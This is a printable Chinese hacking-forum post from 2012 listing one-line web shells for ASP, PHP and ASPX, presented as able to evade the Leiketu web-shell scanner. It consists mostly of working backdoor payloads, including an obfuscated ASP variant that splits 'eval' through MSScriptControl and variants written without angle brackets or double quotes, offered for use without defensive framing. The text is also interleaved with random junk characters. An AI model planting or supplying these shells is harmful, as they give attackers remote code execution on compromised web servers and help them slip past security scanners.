中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]
作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  
( ]% N( k1 s1 i6 f
; k& v( l  ]8 _4 qphp一句话  <?php eval($_POST[1]);?>  $ S( F  y: b2 W' ]1 a$ \
( s  U* C/ V* J. o
aspx一句话
/ V( H& [9 h# }9 p0 i4 h, }
0 _- V0 `* i! k; S. B<script language="C#" runat="server">, `; b/ E% J& p2 [3 K3 z
/ G4 c, n/ a  D+ F/ k- q
WebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");
2 K+ G, q) `. u3 I
  @! b$ U! t% U, E8 U* U</script>
7 g% w9 j, V& @. g, q1 N& w
9 Q/ U3 z" v$ |8 G  ^* b可以躲过雷客图的一句话。1 [6 Y$ Z8 j9 S$ a4 o- R6 |

4 A# A, q" f4 T4 Y. Z  <%
/ _5 g1 R# \0 X; u" o6 z* a3 M7 ?  p6 B" s. y! \7 {6 q
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")6 r1 N9 I$ d" F4 y! C( K: t# R

; w+ R& {/ v* r: t- ~: S  ms.Language="VBScript"! C( \! }% g% T# N/ x3 j
9 @$ V6 P# S$ T( y: ?
  ms.AddObject "Response", Response- ?; i' j& p8 M+ ]6 D* D1 e; ]) G

! ]& d' x. _! J- o2 ]' O  m* o4 T  ms.AddObject "request", request% i( Q6 }$ G3 @0 {
: G! A# V% d4 S5 o% ~$ G. R0 r+ f8 C
  ms.ExecuteStatement("ev"&"al(request(""1""))")
- r" e5 o1 Z$ V; _/ d; f5 D" w5 p% v2 B
9 s+ C; v; l8 D' i% ]( [  %>/ s9 b. i& H5 @& t/ M& R

" H3 q: V: x; \* r  不用'<,>'的asp一句话% b- ^# N. b- o6 s
/ N# F% Y- u5 Q$ }" Q
  <script language=VBScript runat=server>execute request("1")</script>$ d* _; ~2 B; y$ B( Z
2 M5 ]5 Y6 Y) n) ^
  不用双引号的一句话。
: V  e$ Z0 J8 K6 e1 }8 D/ W1 X8 k* Y$ \, H/ s
  <%eval request(chr(35))%>
2 Q, U/ N- k0 R4 q6 o/ r0 R; [



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2